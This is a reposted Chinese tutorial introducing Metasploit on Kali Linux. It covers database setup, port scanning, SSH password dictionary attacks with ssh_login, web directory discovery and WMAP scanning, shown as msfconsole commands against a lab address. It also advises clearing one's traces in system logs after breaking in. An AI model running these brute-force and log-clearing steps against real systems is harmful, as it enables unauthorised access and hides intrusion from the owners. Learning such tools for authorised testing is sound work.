安基网 首页 安全 渗透测试 查看内容

Kali Linux(metasploit渗透测试平台)

2019-11-30 11:39| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: metasploit-framework, 在渗透测试中广泛使用的一个强大工具和平台,关键它是免费的,多数资源均能在http://www.metasploit.com 站点找到。Kali Linux中自带了该工具,可在Application -> Exploitation Tools -> metasploit中开启。Kali Linux桌面中metasploit的位置或是在命令行中执行:msfconsol ...

metasploit-framework, 在渗透测试中广泛使用的一个强大工具和平台,关键它是免费的,多数资源均能在http://www.metasploit.com 站点找到。

Kali Linux中自带了该工具,可在Application -> Exploitation Tools -> metasploit中开启。

Kali Linux桌面中metasploit的位置

或是在命令行中执行:

msfconsole 

启动界面

注意,有些模块需要启用Metasploit Database,以存储获得的大量数据,可通过如下命令来启用:

root@kali-linux:/home/admin# msfdb init
root@kali-linux:/home/admin# systemctl enable postgresql
root@kali-linux:/home/admin# systemctl start postgresql

然后启动msfconsole可见如下:

数据库加载启动后界面

第一步:信息收集

通过msf内嵌的nmap或其它端口扫描工具等,进行端口扫描,看那些服务是Open,对应的服务进程是什么样的,版本信息等。

如下所示:如此多的开放端口,大丰收,足够玩上一个周的,哦,不是,足以支撑着我把metasploit学习个七七八八。

端口扫描结果

开胃菜

尝试字典破解一些ssh的用户名和密码

注:靠运气,碰到一些不修改密码或是密码设置非常简单的(当然也依靠前面的信息收集,比如管理员的生日是多少,已经找到的该用户的其它账户信息-----记录密码是一件痛苦的事情,特别对于老年人来说,所以,人们都会下意识的使用同一套密码。)

msf5 > search name:scanner

# 搜索一下,哪些扫描工具可用

msf5 > use auxiliary/scanner/ssh/ssh_login

# 装入ssh_login工具,执行info查看工具说明

#执行info查看工具说明

msf5 auxiliary(scanner/ssh/ssh_login) > show options

#查看哪些参数可设置

msf5 auxiliary(scanner/ssh/ssh_login) > show missing

#查看哪些关键参数需要补齐

msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 172.12.0.2
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/admin/sshusername.txt

设置目的主机和使用事先准备好的用户名、密码(username password)字典。

msf5 auxiliary(scanner/ssh/ssh_login) > run

#执行字典破解

两个账户破解成功


进入后,记得消除你的痕迹(日志记录)

cat /var/log/messages

cat /var/log/audit/audit.log

 msf5 auxiliary(scanner/ssh/ssh_login) > back

#退出该模块


扫描

Metasploit有很多的扫描工具可使用,通过search name:scanner可查询到。选择时,根据你端口扫描的结果进行加载。

Web站点的目录发现

msf5 > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > set RHOSTS 172.12.0.2


#执行扫描,并观察结果

执行后,可见这些目录都是真实存在的,如在浏览器中输入:


#浏览器中的呈现结果

WMAP扫描

这是个metasploit内嵌的比较全面的Web应用扫描工具。

msf5 > load wmap
 
.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] === et [ ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf5 >
msf5 > ?
 
wmap Commands
=============
 
 Command Description
 ------- -----------
 wmap_modules Manage wmap modules
 wmap_nodes Manage nodes
 wmap_run Test targets
 wmap_sites Manage sites
 wmap_targets Manage targets
 wmap_vulns Display web vulns


添加要扫描的站点

msf5 > wmap_sites -a http://172.12.0.2

添加要扫描的URL

msf5 > wmap_targets -t http://172.12.0.2/app

查看添加的目录

msf5 > wmap_targets -l

测试检查加载的模块

msf5 > wmap_run –t

执行扫描:

msf5 > wmap_run -e


查看扫描结果:

msf5 > wmap_vulns –l


#扫描结果

还有很多模块有待研究



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6764628249814237704/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部